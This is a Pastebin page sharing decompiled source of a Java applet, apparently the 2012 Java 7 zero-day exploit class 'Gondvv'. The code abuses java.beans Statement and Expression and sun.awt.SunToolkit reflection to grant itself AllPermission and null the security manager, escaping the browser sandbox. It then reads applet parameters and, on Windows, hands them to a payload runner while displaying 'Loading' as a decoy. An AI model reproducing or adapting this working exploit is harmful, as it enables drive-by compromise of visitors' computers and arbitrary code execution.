API tools faq
paste
Advertisement
eromang

Java 7 0day Gondvv.class

eromang
Aug 27th, 2012
1,114
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 2.47 KB | None | 0 0
raw download clone embed print report
  1. package cve2012xxxx;
  2.  
  3. import java.applet.Applet;
  4. import java.awt.Graphics;
  5. import java.beans.Expression;
  6. import java.beans.Statement;
  7. import java.lang.reflect.Field;
  8. import java.net.URL;
  9. import java.security.AccessControlContext;
  10. import java.security.AllPermission;
  11. import java.security.CodeSource;
  12. import java.security.Permissions;
  13. import java.security.ProtectionDomain;
  14. import java.security.cert.Certificate;
  15.  
  16. public class Gondvv extends Applet
  17. {
  18.   public void disableSecurity()
  19.     throws Throwable
  20.   {
  21.     Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
  22.     Permissions localPermissions = new Permissions();
  23.     localPermissions.add(new AllPermission());
  24.  
  25.     ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
  26.  
  27.     AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] { localProtectionDomain });
  28.     SetField(Statement.class, "acc", localStatement, localAccessControlContext);
  29.     localStatement.execute();
  30.   }
  31.  
  32.   private Class GetClass(String paramString) throws Throwable
  33.   {
  34.     Object[] arrayOfObject = new Object[1];
  35.     arrayOfObject[0] = paramString;
  36.     Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
  37.  
  38.     localExpression.execute();
  39.     return (Class)localExpression.getValue();
  40.   }
  41.  
  42.   private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
  43.     throws Throwable
  44.   {
  45.     Object[] arrayOfObject = new Object[2];
  46.     arrayOfObject[0] = paramClass;
  47.     arrayOfObject[1] = paramString;
  48.     Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
  49.     localExpression.execute();
  50.     ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
  51.   }
  52.  
  53.   public void init()
  54.   {
  55.     try
  56.     {
  57.       disableSecurity();
  58.       String s1 = getParameter("bn");
  59.       String s = getParameter("xiaomaolv");
  60.       String s2 = getParameter("si");
  61.       String s3 = getParameter("bs");
  62.       String str1 = System.getProperty("os.name");
  63.  
  64.       if (str1.indexOf("Windows") >= 0) {
  65.         Gondzz.xrun(s, s1, s2, Integer.valueOf(s3));
  66.       }
  67.  
  68.     }
  69.     catch (Throwable localThrowable)
  70.     {
  71.       localThrowable.printStackTrace();
  72.     }
  73.   }
  74.  
  75.   public void paint(Graphics paramGraphics)
  76.   {
  77.     paramGraphics.drawString("Loading", 50, 25);
  78.   }
  79. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!